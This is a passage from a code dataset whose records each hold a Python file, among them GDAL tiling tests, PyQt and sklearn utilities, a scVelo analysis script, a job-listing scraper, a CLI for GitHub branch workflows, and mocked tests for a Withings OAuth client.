glob.glob(\"tmp/out_gdal2tiles_smallworld_png/*/*/*.png\")\n for filename in to_convert:\n to_filename = filename.replace(\n \"tmp/out_gdal2tiles_smallworld_png/\",\n \"tmp/out_gdal2tiles_smallworld_webp_from_png/\",\n )\n to_filename = to_filename.replace(\".png\", \".webp\")\n to_folder = os.path.dirname(to_filename)\n os.makedirs(to_folder, exist_ok=True)\n\n _convert_png_to_webp(filename, to_filename, quality)\n\n to_compare = glob.glob(\"tmp/out_gdal2tiles_smallworld_webp_from_png/*/*/*.webp\")\n for filename in to_compare:\n webp_filename = filename.replace(\n \"tmp/out_gdal2tiles_smallworld_webp_from_png/\",\n \"tmp/out_gdal2tiles_smallworld_webp/\",\n )\n diff_found = compare_db(gdal.Open(webp_filename), gdal.Open(filename))\n assert not diff_found, (resampling, filename)\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_png\", ignore_errors=True)\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_webp_from_png\", ignore_errors=True)\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_webp\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"WEBP\")\ndef test_gdal2tiles_py_webp(script_path):\n\n _run_webp_test(script_path, \"average\")\n try:\n import numpy\n from PIL import Image\n\n import osgeo.gdal_array as gdalarray\n\n del Image, numpy, gdalarray\n pil_available = True\n except ImportError:\n pil_available = False\n\n if pil_available:\n _run_webp_test(script_path, \"antialias\")\n","repo_name":"OSGeo/gdal","sub_path":"autotest/pyscripts/test_gdal2tiles.py","file_name":"test_gdal2tiles.py","file_ext":"py","file_size_in_byte":19103,"program_lang":"python","lang":"en","doc_type":"code","stars":4154,"dataset":"github-code","pt":"19"} +{"seq_id":"24462766300","text":"from PyQt5.QtWidgets import QWidget, QVBoxLayout, QTabWidget\n\n\n# klasa służąca do stworzenia kart do przełączania się pomiędzy mapą a wykresem\nclass Tabs(QWidget):\n def __init__(self, chart, map):\n super().__init__()\n self.__chart = chart\n self.__map = map\n\n # ustawienie układu jako poziomy układ\n self.layout = QVBoxLayout(self)\n # stworzenie obiektów\n self.tabs = QTabWidget()\n self.tab1 = QWidget()\n self.tab2 = QWidget()\n self.tabs.resize(100, 100)\n # 
create the two tabs\n        self.tabs.addTab(self.tab1, \"Wykres\")\n        self.tabs.addTab(self.tab2, \"Mapa\")\n        self.tab1.layout = QVBoxLayout()\n        # put the chart in the first tab\n        self.tab1.layout.addWidget(self.__chart)\n        self.tab1.setLayout(self.tab1.layout)\n        self.tab2.layout = QVBoxLayout()\n        # put the map in the second tab\n        self.tab2.layout.addWidget(self.__map)\n        self.tab2.setLayout(self.tab2.layout)\n        self.layout.addWidget(self.tabs)\n        self.setLayout(self.layout)\n","repo_name":"Piotreksaw/projektPO","sub_path":"glowne_pliki/main/tabs.py","file_name":"tabs.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"21956641153","text":"import numpy as np\nfrom sklearn.decomposition import PCA, FastICA\nfrom sklearn.random_projection import GaussianRandomProjection\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndef split(X, Y, test_frac=0.1):\n\t# Split data\n\tcutoff = int(test_frac * len(Y))\n\tix = np.arange(0, len(Y))\n\tnp.random.shuffle(ix)\n\ttest_index = ix[:cutoff]\n\ttrain_index = ix[cutoff:]\n\tX_train, X_test = X.iloc[train_index], X.iloc[test_index]\n\tY_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]\n\n\treturn X_train, X_test, Y_train, Y_test\n\n\ndef transform4(X, Y, pca_num, ica_num, rca_num, rf_num):\n\t# Dimension Reduction and transforming data to fit\n\tpca = PCA(n_components=pca_num)\n\tX_pca = pca.fit_transform(X)\n\n\tica = FastICA(n_components=ica_num)\n\tX_ica = ica.fit_transform(X)\n\n\trca = GaussianRandomProjection(n_components=rca_num)\n\tX_rca = rca.fit_transform(X)\n\n\trf = RandomForestClassifier(n_estimators=100, max_depth=5, n_jobs=-1)\n\trf.fit(X, Y)\n\timportances = rf.feature_importances_\n\tsorted_impt = np.argsort(importances)[::-1] # Sorted in descending order\n\tX_rf = X.iloc[:, sorted_impt[:rf_num]]\n\n\treturn X_pca, X_ica, X_rca, X_rf","repo_name":"isw4/ML03-Unsupervised-Learning","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"7243874384","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExample of function header for PHYS20161\n\nCode consists of a single function that outputs roots of a second order polynomial.\nAlso shows how line breaks should be taken over mathematical operations.\n\nLloyd Cawthorne 29/01/20\n\n\"\"\"\n\nimport math\n\n\ndef square_root(x_squared_coefficient, x_coefficient, constant):\n    \"\"\"\n    Returns the two roots of a second order polynomial.\n\n    Coefficients should be given to conform to\n\n    x_squared_coefficient x^2 + x_coefficient x + constant = 0.\n\n    x = (-x_coefficient +/- sqrt[x_coefficient^2 - 4 x_squared_coefficient\n                                 * constant]) / (2\n                                                 * x_squared_coefficient)\n\n    Args:\n        x_squared_coefficient: float\n        x_coefficient: float\n        constant: float\n    Returns:\n        Two solutions in a list: [float, float]\n    Raises:\n        ZeroDivisionError: If x_squared_coefficient = 0\n        ValueError: Math domain error, imaginary solution\n\n    L. 
Cawthorne 05/02/20\n \"\"\"\n\n try:\n square_root_term = math.sqrt(x_coefficient**2 - 4\n * x_squared_coefficient\n * constant)\n solution_1 = ((-x_coefficient + square_root_term)\n / (2 * x_squared_coefficient))\n solution_2 = ((-x_coefficient - square_root_term)\n / (2 * x_squared_coefficient))\n return [solution_1, solution_2]\n except ZeroDivisionError:\n print('x_squared_coefficient cannot be 0.')\n return None\n except ValueError:\n print('No real solutions.')\n return None\n","repo_name":"clead6/python-programming","sub_path":"Style Guide/square_root_header.py","file_name":"square_root_header.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12229394109","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_last_page_s(url):\n results = requests.get(url).text\n soup = BeautifulSoup(results, 'html.parser')\n pages = (soup.find_all(class_=\"s-pagination--item\"))\n return int(pages[-2].text.strip())\n\n\ndef find_jobs_s(url):\n db = []\n results = requests.get(url).text\n soup = BeautifulSoup(results, 'html.parser')\n jobs = soup.find_all(class_=\"grid--cell fl1\")\n for job in jobs:\n link = job.find(\"a\")\n if link:\n title = link[\"title\"]\n company = job.find(\n class_=\"fc-black-700 fs-body1 mb4\").find(\"span\").text.strip()\n url_link = \"https://stackoverflow.com\" + link[\"href\"]\n db.append((title, company, url_link))\n return db\n","repo_name":"bcw1145/Day-Thirteen-and-Fourteen","sub_path":"stackoverflow.py","file_name":"stackoverflow.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10838965297","text":"# A python wrapper for sweep cut procedure\n# A - the sparse matrix representing the symmetric graph\n# ids - the order of vertices given\n# results - the best set with the smallest conductance\n# actual_length - the number of vertices in the best set\n# num - the number of vertices given\n# values - A vector scoring each vertex (e.g. pagerank value). 
\n# This will be sorted and turned into one of the other inputs.\n# flag - 0 for sweepcut_with_sorting and 1 for sweepcut_without_sorting\n# degrees - user defined degrees, set it to be [] if not provided\n# min_cond - minimum conductance\n\nfrom operator import itemgetter\nimport numpy as np\nfrom numpy.ctypeslib import ndpointer\nimport ctypes\n#from localgraphclustering.find_library import load_library\n\ndef wrapped_ndptr(*args, **kwargs):\n base = ndpointer(*args, **kwargs)\n def from_param(cls, obj):\n if obj is None:\n return obj\n return base.from_param(obj)\n return type(base.__name__, (base,), {'from_param': classmethod(from_param)})\n\ndef sweepcut_cpp(n,ai,aj,a,ids,num,values,flag,lib,degrees = None):\n float_type = ctypes.c_double\n dt = np.dtype(ai[0])\n (itype, ctypes_itype) = (np.int64, ctypes.c_int64) if dt.name == 'int64' else (np.uint32, ctypes.c_uint32)\n dt = np.dtype(aj[0])\n (vtype, ctypes_vtype) = (np.int64, ctypes.c_int64) if dt.name == 'int64' else (np.uint32, ctypes.c_uint32)\n\n #lib = load_library()\n \n if (vtype, itype) == (np.int64, np.int64):\n fun = lib.sweepcut_with_sorting64 if flag == 0 else lib.sweepcut_without_sorting64\n elif (vtype, itype) == (np.uint32, np.int64):\n fun = lib.sweepcut_with_sorting32_64 if flag == 0 else lib.sweepcut_without_sorting32_64\n else:\n fun = lib.sweepcut_with_sorting32 if flag == 0 else lib.sweepcut_without_sorting32\n\n #call C function\n ids=np.array(ids,dtype=vtype)\n values=np.array(values,dtype=float_type)\n results=np.zeros(num,dtype=vtype)\n fun.restype=ctypes_vtype\n min_cond = np.array([0.0],dtype=float_type)\n if degrees is not None:\n degrees = np.array(degrees,dtype=float_type)\n if flag == 0:\n fun.argtypes=[ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ctypes_vtype,ctypes_vtype,\n ndpointer(ctypes_itype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n ctypes_vtype,\n ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n wrapped_ndptr(dtype=ctypes.c_double,ndim=1,flags=\"C_CONTIGUOUS\")\n ]\n actual_length=fun(values,ids,results,num,n,ai,aj,a,0,min_cond,degrees)\n else:\n fun.argtypes=[ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ctypes_vtype,ctypes_vtype,\n ndpointer(ctypes_itype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n ctypes_vtype,\n ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n wrapped_ndptr(dtype=ctypes.c_double,ndim=1,flags=\"C_CONTIGUOUS\")\n ]\n actual_length=fun(ids,results,num,n,ai,aj,a,0,min_cond,degrees)\n\n actual_results=np.empty(actual_length,dtype=vtype)\n actual_results[:]=[results[i] for i in range(actual_length)]\n min_cond = min_cond[0]\n\n return (actual_length,actual_results,min_cond)\n","repo_name":"RevoData/LocalGraphClustering","sub_path":"localgraphclustering/cpp/sweepcut_cpp.py","file_name":"sweepcut_cpp.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"33332602650","text":"import os\nimport subprocess\nimport click\nfrom src.utils.git import get_repo_abspath, get_url\nfrom src.utils.shell import shell_run\nfrom src.utils.config_file import read_config\nfrom src.commands import hotfix_command, feature_command, release_command\nfrom 
src.utils.config_file import CONFIG_FILE_NAME\nfrom src.settings import color\n\n\nfailed_color = color.RED\nsucceed_color = color.GREEN\ndisable_color = color.END\n\n\ndef echo(output,verbose):\n    verbose_output = output[0]\n    note = output[1]\n    status = output[2]\n    if verbose:\n        click.echo(verbose_output)\n    if status == \"succeed\":\n        color = succeed_color\n    else:\n        color = failed_color\n    click.echo(color + note + disable_color)\n\n\n@click.group()\n@click.pass_context\ndef githubflow(ctx):\n    ctx.obj[\"url\"] = get_url()\n\n@githubflow.command()\n@click.option('-a','--action',required=True,help=\"create / ready / done\")\n@click.option('--verbose', '-v', is_flag=True, help=\"Verbose output.\")\n@click.argument('branch_name')\ndef hotfix(action,branch_name,verbose):\n    \"\"\"\n    Manage Hotfix branch workflow. (READ MORE: https://documentation/hotfix)\n    \"\"\"\n    output = hotfix_command.main(action, branch_name)\n    echo(output, verbose)\n\n@githubflow.command()\n@click.option('-a','--action',required=True,help=\"create / ready / done\")\n@click.option('--verbose', '-v', is_flag=True, help=\"Verbose output.\")\n@click.argument('branch_name')\ndef feature(action,branch_name,verbose):\n    \"\"\"\n    Manage Feature branch workflow. (READ MORE: https://documentation/feature)\n    \"\"\"\n    output = feature_command.main(action, branch_name)\n    echo(output, verbose)\n\n@githubflow.command()\n@click.option('-a','--action',required=True,help=\"create / publish\")\n@click.option('--verbose', '-v', is_flag=True, help=\"Verbose output.\")\n@click.argument('branch_name')\ndef release(action,branch_name,verbose):\n    \"\"\"\n    Manage Release branch workflow. (READ MORE: https://documentation/release)\n    \"\"\"\n    output = release_command.main(action, branch_name)\n    echo(output, verbose)\n\n\ndef main():\n    githubflow(obj={})\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"ShakedBraimok/github-flow","sub_path":"src/github_flow.py","file_name":"github_flow.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"}
+{"seq_id":"14024589731","text":"from collections import deque\nfrom typing import List\n\n\nclass Solution:\n    def maxDistance(self, grid: List[List[int]]) -> int:\n        n = len(grid)\n        dq = deque([(i, j, 0) for i in range(n) for j in range(n) if grid[i][j]])\n        dist = [[0] * n for i in range(n)]\n        neighbours = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n        \n        while dq:\n            i, j, cost = dq.popleft()\n            \n            if dist[i][j]:\n                continue\n            \n            dist[i][j] = cost\n            \n            for x, y in neighbours:\n                if 0 <= i + x < n and 0 <= j + y < n and grid[i + x][j + y] == 0 and dist[i + x][j + y] == 0:\n                    dq.append((i + x, j + y, cost + 1))\n        \n        maxi = -1\n        for i in range(n):\n            maxi = max(maxi, max(dist[i]))\n        \n        return maxi if maxi != 0 else -1\n        ","repo_name":"prashanthr11/Leetcode_solutions","sub_path":"1162-as-far-from-land-as-possible/1162-as-far-from-land-as-possible.py","file_name":"1162-as-far-from-land-as-possible.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"17539066584","text":"##run scVelo\nimport anndata\nimport scvelo as scv\nimport pandas as pd\nimport numpy as np\nimport matplotlib as plt\nplt.use('pdf')\nimport scanpy as sc\n\n##input the h5ad from scVelo_input.R\nadata_h5ad=sc.read_h5ad(\"/public/ojsys/eye/sujianzhong/chencheng/Singlecell/LiHui/final/scVelo/data.h5ad\")\nadata_h5ad.obs[\"wsnn_res_0.5_cell_type\"]\n\n##input metadata from 
scVelo_input.R\nmeta=pd.read_csv(\"/public/ojsys/eye/sujianzhong/chencheng/Singlecell/LiHui/final/scVelo/metadata.csv\",index_col=0)\nadata_h5ad.obs=meta\n\n##input the loom\nadata_loom = anndata.read_loom(\"/public/ojsys/eye/sujianzhong/chencheng/Singlecell/LiHui/final_version/scVelo/total_fetus.loom\")\nadata_loom.var_names_make_unique()\n\n##change the cell barcodes in loom\nbarcodes=adata_loom.obs.index.tolist()\nfor i in range(len(barcodes)):\n if barcodes[i].startswith('NR'):\n barcodes[i]=barcodes[i].replace('NR:','').replace('x','-1_1')\n elif barcodes[i].startswith('CMZ'):\n barcodes[i]=barcodes[i].replace('CMZ:','').replace('x','-1_2')\nadata_loom.obs.index=barcodes\n\n##subset the cells both in adata_h5ad and adata_loom\ncell_names=adata_h5ad.obs.index \nadata_loom_subset=adata_loom[adata_loom.obs_names.isin(cell_names), :]\n\n##merge adata_h5ad and adata_loom\nadata_merge=scv.utils.merge(adata_h5ad,adata_loom_subset)\n#sc.write('merged.h5ad',adata_merge,compression='gzip',compression_opts=1)\n\n##figure setting\nscv.settings.verbosity = 3\nscv.settings.set_figure_params('scvelo', facecolor='white', dpi=100, frameon=False)\nscv.settings.rcParams['font.size']=4 ##font.size\n\n##data preprocess\nscv.pp.filter_and_normalize(adata_merge, min_shared_counts=20, n_top_genes=2000)\nscv.pp.moments(adata_merge, n_pcs=30, n_neighbors=30)\n\n##RNA Velocity\nscv.tl.recover_dynamics(adata_merge)\nscv.tl.velocity(adata_merge, mode='dynamical')\n#scv.tl.velocity(adata_merge, mode='stochastic')\nscv.tl.velocity_graph(adata_merge)\n\n##save the result\nadata_merge.write('scVelo.h5ad')\n","repo_name":"sulab-wmu/hRSLCs-Retina","sub_path":"analysis/figure1/scVelo.py","file_name":"scVelo.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38896781645","text":"#!/usr/bin/env python\n\nimport os\nimport shlex\nimport tempfile\nimport subprocess\nfrom time import sleep\n\n\nclass Process(object):\n \"\"\"Wrapper around subprocess module that runs a command with a\n specific environment. 
When run method is called it will block\n until the command finishes executing.\n\n Usage:\n\n command = 'date'\n environment = {'TZ': 'UTC'}\n\n proc = Process(command, environment)\n proc.run()\n\n if proc.status:\n print ''.join(proc.stdout)\n else:\n print ''.join(proc.stderr)\n \"\"\"\n def __init__(self, command, environment=os.environ.copy(), logger=None):\n self.status = None\n self.stdout = None\n self.stderr = None\n self.logger = logger\n self.process = None\n self.command = command\n self.environment = environment\n\n def run(self):\n f_stdout = tempfile.TemporaryFile()\n f_stderr = tempfile.TemporaryFile()\n\n self.process = subprocess.Popen(shlex.split(self.command),\n env=self.environment,\n stdout=f_stdout,\n stderr=f_stderr)\n\n while self.process.poll() is None:\n sleep(.5)\n\n f_stdout.seek(0)\n f_stderr.seek(0)\n\n self.stdout = f_stdout.readlines()\n self.stderr = f_stderr.readlines()\n\n f_stdout.close()\n f_stderr.close()\n\n if self.process.returncode == 0:\n self.status = True\n else:\n self.status = False\n\n if self.logger:\n self.logger.debug(\"[Process:localhost] Executing command: '{0}'\".format(self.command))\n\n return self.status\n","repo_name":"miljank/centreon-client","sub_path":"centreond/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"72525365801","text":"# ---------------------------------- PROBLEM 17 (MEDIUM) --------------------------------------#\n# Remove Kth Node From End\n\n# Write a function that takes in the head of a Singly Linked List and an integer k (assume that the \n# list has at least k nodes). The function should remove the kth node from the end of the list. 
\n# Note that every node in the Singly Linked List has a \"value\" property storing its value as well as \n# a \"next\" property pointing to the next node in the list or None (null) if it is the tail of the list.\n\n# Sample input: 0 -> 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 -> 9, 4\n# Sample output: 0 -> 1 -> 2 -> 3 -> 4 -> 5 -> 7 -> 8 -> 9\n\n# ----------------METHOD 01---------------------#\n# COMPLEXITY = TIME: O(n), SPACE: O(1)\ndef removeKthNodeFromEnd(head, k):\n\tcounter = 1 \n\tfirst = head\n\tsecond = head\n\twhile counter <= k:\n\t\tsecond = second.next\n\t\tcounter += 1\n\tif second is None:\n\t\thead.value = head.next.value\n\t\thead.next = head.next.next\n\t\treturn\n\twhile second.next is not None:\n\t\tsecond = second.next\n\t\tfirst = first.next\n\tfirst.next = first.next.next\n\treturn head\n# ----------------METHOD 01---------------------#","repo_name":"CodeInDna/Algo_with_Python","sub_path":"02_Medium/17_Remove_Kth_Node_From_End/Remove_kth_Node_From_End.py","file_name":"Remove_kth_Node_From_End.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"17053123630","text":"from __future__ import annotations\n\nimport os\nimport time\nfrom collections.abc import Generator\nfrom json import JSONDecodeError\nfrom typing import Any\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport pytest\nfrom egg_stats import withings_provider\nfrom egg_stats.withings_provider import _AuthClient\nfrom egg_stats.withings_provider import _AuthedUser\nfrom egg_stats.withings_provider import Activity\nfrom egg_stats.withings_provider import HTTPResponse\nfrom egg_stats.withings_provider import WithingsProvider\n\nMOCK_AUTH_USER: Any = {\n \"userid\": \"mockuserid\",\n \"access_token\": \"mock_access_token\",\n \"refresh_token\": \"mock_refresh_token\",\n \"scope\": \"user.activity,user.metrics\",\n \"expiry\": time.time() + 1000,\n \"token_type\": \"Bearer\",\n}\nMOCK_AUTH_RESPONSE: Any = {\n \"status\": 0,\n \"body\": {\n \"userid\": \"mockuserid\",\n \"access_token\": \"mock_access_token\",\n \"refresh_token\": \"mock_refresh_token\",\n \"scope\": \"user.activity,user.metrics\",\n \"expires_in\": time.time() + 1000,\n \"token_type\": \"Bearer\",\n },\n}\nMOCK_ACTIVITY_RESPONSE: Any = [\n {\n \"steps\": 55,\n \"distance\": 44.71,\n \"elevation\": 0,\n \"soft\": 240,\n \"moderate\": 0,\n \"intense\": 0,\n \"active\": 0,\n \"calories\": 1.91,\n \"totalcalories\": 2066.383,\n \"hr_average\": 71,\n \"hr_min\": 62,\n \"hr_max\": 84,\n \"hr_zone_0\": 7241,\n \"hr_zone_1\": 0,\n \"hr_zone_3\": 0,\n \"deviceid\": None,\n \"hash_deviceid\": None,\n \"timezone\": \"America/New_York\",\n \"date\": \"2023-01-28\",\n \"modified\": 1675059819,\n \"brand\": 18,\n \"is_tracker\": True,\n }\n]\n\n\n@pytest.fixture(autouse=True)\ndef mock_env() -> Generator[None, None, None]:\n \"\"\"Mock the environment variables.\"\"\"\n mask_env = {\n \"WITHINGS_CLIENT_ID\": \"\",\n \"WITHINGS_CLIENT_SECRET\": \"\",\n }\n\n with patch.dict(os.environ, mask_env):\n yield None\n\n\n@pytest.fixture\ndef auth_client() -> _AuthClient:\n return _AuthClient(\"mock\", \"mock\", MagicMock())\n\n\n@pytest.fixture\ndef provider(auth_client: _AuthClient) -> WithingsProvider:\n withing_provider = WithingsProvider(\"mock\", \"mock\")\n withing_provider._auth_client = auth_client\n return withing_provider\n\n\ndef test_HTTPResponse_handles_empty_json() -> None:\n \"\"\"Test the HTTPResponse class.\"\"\"\n response = 
MagicMock()\n response.json.side_effect = JSONDecodeError(\"msg\", \"doc\", 0)\n response.status_code = 204\n response.url = \"https://example.com\"\n response.is_success = False\n\n http_response = HTTPResponse(response)\n\n assert http_response.json() == {}\n assert http_response.status_code == 204\n assert http_response.url == \"https://example.com\"\n assert http_response.is_success is False\n\n\ndef test_HTTPResponse_handles_200() -> None:\n \"\"\"Test the HTTPResponse class.\"\"\"\n response = MagicMock()\n response.json.return_value = {\"status\": 0}\n response.status_code = 200\n response.url = \"https://example.com\"\n response.is_success = True\n\n http_response = HTTPResponse(response)\n\n assert http_response.json() == {\"status\": 0}\n assert http_response.status_code == 200\n assert http_response.url == \"https://example.com\"\n assert http_response.is_success is True\n\n\ndef test_AuthedUser_from_dict() -> None:\n body = MOCK_AUTH_RESPONSE[\"body\"]\n authed_user = _AuthedUser.from_dict(body)\n\n assert authed_user.userid == body[\"userid\"]\n assert authed_user.access_token == body[\"access_token\"]\n assert authed_user.refresh_token == body[\"refresh_token\"]\n assert authed_user.scope == body[\"scope\"]\n # Less than due to the expiry buffer being subtracted\n assert authed_user.expiry < time.time() + body[\"expires_in\"]\n assert authed_user.token_type == body[\"token_type\"]\n\n\ndef test_AuthClient_raises_ValueError_if_no_client_id() -> None:\n from egg_stats.withings_provider import _AuthClient\n\n with pytest.raises(ValueError):\n _AuthClient()\n\n\ndef test_AuthClient_reads_secrets_from_env() -> None:\n os.environ[\"WITHINGS_CLIENT_ID\"] = \"foo\"\n os.environ[\"WITHINGS_CLIENT_SECRET\"] = \"bar\"\n\n auth_client = _AuthClient()\n\n assert auth_client.client_id == \"foo\"\n assert auth_client.client_secret == \"bar\"\n\n\ndef test_AuthClient_reads_secrets_from_args() -> None:\n os.environ[\"WITHINGS_CLIENT_ID\"] = \"foo\"\n os.environ[\"WITHINGS_CLIENT_SECRET\"] = \"bar\"\n\n auth_client = _AuthClient(\"high\", \"low\")\n\n assert auth_client.client_id == \"high\"\n assert auth_client.client_secret == \"low\"\n\n\ndef test_AuthClient_authed_user_property_raises_ValueError_if_no_authed_user() -> None:\n auth_client = _AuthClient(\"mock\", \"mock\", MagicMock())\n\n with pytest.raises(ValueError):\n auth_client.authed_user\n\n\ndef test_get_state_code(auth_client: _AuthClient) -> None:\n result01 = auth_client.create_state_code()\n result02 = auth_client.create_state_code()\n\n assert result01 != result02\n\n\ndef test_get_authorization_url(auth_client: _AuthClient) -> None:\n resp = HTTPResponse(MagicMock())\n resp.url = \"https://account.withings.com/oauth2_user/authorize2\"\n state = \"mock_challenge\"\n rd_url = \"https://mock_redirect_url.com/mock\"\n scope = \"mock_scope\"\n expected_params = {\n \"response_type\": \"code\",\n \"client_id\": \"mock\",\n \"scope\": scope,\n \"state\": state,\n \"redirect_uri\": rd_url,\n }\n url = withings_provider.AUTH_URL\n\n with patch.object(auth_client, \"_handle_http\", return_value=resp) as mock_http:\n result = auth_client.get_authorization_url(rd_url, scope, state)\n\n assert result == resp.url\n mock_http.assert_called_once_with(\"GET\", url, params=expected_params)\n\n\ndef test_authenticate(auth_client: _AuthClient) -> None:\n mockresp = HTTPResponse(MagicMock())\n mockresp._json = MOCK_AUTH_RESPONSE\n code = \"mockcode\"\n redirect_uri = \"https://mock_redirect_url.com/mock\"\n expected_params = {\n \"action\": 
\"requesttoken\",\n \"client_id\": \"mock\",\n \"client_secret\": \"mock\",\n \"grant_type\": \"authorization_code\",\n \"code\": code,\n \"redirect_uri\": redirect_uri,\n }\n url = f\"{withings_provider.BASE_URL}/v2/oauth2\"\n\n with patch.object(auth_client, \"_handle_http\", return_value=mockresp) as mock_http:\n auth_client.authenticate(code, redirect_uri)\n\n assert auth_client._authed_user is not None\n assert auth_client._authed_user.userid == MOCK_AUTH_RESPONSE[\"body\"][\"userid\"]\n mock_http.assert_called_once_with(\"POST\", url, params=expected_params)\n\n\ndef test_get_bearer_token_with_existing(auth_client: _AuthClient) -> None:\n auth_client._authed_user = _AuthedUser(**MOCK_AUTH_USER)\n\n result = auth_client._get_bearer_token()\n\n assert result == auth_client._authed_user.access_token\n\n\ndef test_get_bearer_token_refresh(auth_client: _AuthClient) -> None:\n auth_client._authed_user = _AuthedUser(**MOCK_AUTH_USER)\n auth_client._authed_user.expiry = 0\n\n with patch.object(auth_client, \"_refresh_access_token\") as mock_refresh:\n mock_refresh.return_value = _AuthedUser(**MOCK_AUTH_USER)\n result = auth_client._get_bearer_token()\n\n mock_refresh.assert_called_once()\n assert result == MOCK_AUTH_RESPONSE[\"body\"][\"access_token\"]\n\n\ndef test_get_bearer_token_no_authed_user(auth_client: _AuthClient) -> None:\n with pytest.raises(ValueError, match=\"^Expected authenticated user.$\"):\n auth_client._get_bearer_token()\n\n\ndef test_get_headers(auth_client: _AuthClient) -> None:\n with patch.object(auth_client, \"_get_bearer_token\") as mock_token:\n mock_token.return_value = \"mocktoken\"\n result = auth_client.get_headers()\n\n mock_token.assert_called_once()\n assert result[\"Authorization\"] == \"Bearer mocktoken\"\n\n\ndef test_refresh_access_token(auth_client: _AuthClient) -> None:\n auth_client._authed_user = _AuthedUser(**MOCK_AUTH_USER)\n auth_client._authed_user.access_token = \"some_old_token\"\n mockresp = HTTPResponse(MagicMock())\n mockresp._json = MOCK_AUTH_RESPONSE\n expected_token = MOCK_AUTH_RESPONSE[\"body\"][\"access_token\"]\n expected_params = {\n \"action\": \"requesttoken\",\n \"client_id\": \"mock\",\n \"client_secret\": \"mock\",\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": \"mock_refresh_token\",\n }\n url = f\"{withings_provider.BASE_URL}/v2/oauth2\"\n\n with patch.object(auth_client, \"_handle_http\", return_value=mockresp) as mock_http:\n auth_client._refresh_access_token()\n\n assert auth_client._authed_user.access_token == expected_token\n mock_http.assert_called_once_with(\"POST\", url, params=expected_params)\n\n\ndef test_create_signature(auth_client: _AuthClient) -> None:\n result = auth_client.get_signature(\"mockdata\", \"12345\")\n # This is the expected result of the above data and timestamp\n assert result == \"8b3db37b7c80908b944b7fc5164c42b235da89772cf56c745a734bf74dac287a\"\n\n\ndef test_get_nonce(auth_client: _AuthClient) -> None:\n mockresp = HTTPResponse(MagicMock())\n mockresp._json = {\"status\": 0, \"body\": {\"nonce\": \"mock\"}}\n set_timestamp = 12345\n expected_params = {\n \"action\": \"getnonce\",\n \"client_id\": \"mock\",\n \"signature\": auth_client.get_signature(\"getnonce\", str(set_timestamp)),\n \"timestamp\": str(set_timestamp),\n }\n url = f\"{withings_provider.BASE_URL}/v2/signature\"\n\n with patch(\"time.time\", return_value=set_timestamp):\n with patch.object(auth_client, \"_handle_http\", return_value=mockresp) as mock:\n result = auth_client.get_nonce()\n\n assert result == \"mock\"\n 
mock.assert_called_once_with(\"POST\", url, params=expected_params)\n\n\ndef test_revoke_access_token(auth_client: _AuthClient) -> None:\n auth_client._authed_user = _AuthedUser(**MOCK_AUTH_USER)\n mockresp = HTTPResponse(MagicMock())\n mockresp._json = {\"status\": 0, \"body\": {}}\n set_nonce = \"mocknonce\"\n expected_params = {\n \"action\": \"revoke\",\n \"client_id\": \"mock\",\n \"nonce\": set_nonce,\n \"signature\": auth_client.get_signature(\"revoke\", set_nonce),\n \"userid\": \"mockuserid\",\n }\n url = f\"{withings_provider.BASE_URL}/v2/oauth2\"\n\n with patch.object(auth_client, \"_handle_http\", return_value=mockresp) as mockhttp:\n with patch.object(auth_client, \"get_nonce\", return_value=set_nonce):\n auth_client._revoke_access_token()\n\n mockhttp.assert_called_once_with(\"POST\", url, params=expected_params)\n\n\ndef test_auth_client_handle_http(auth_client: _AuthClient) -> None:\n mock_resp = MagicMock(status_code=200, json=MagicMock())\n mock_resp.json.return_value = {\"status\": 0, \"body\": {\"mock\": \"body\"}}\n url = 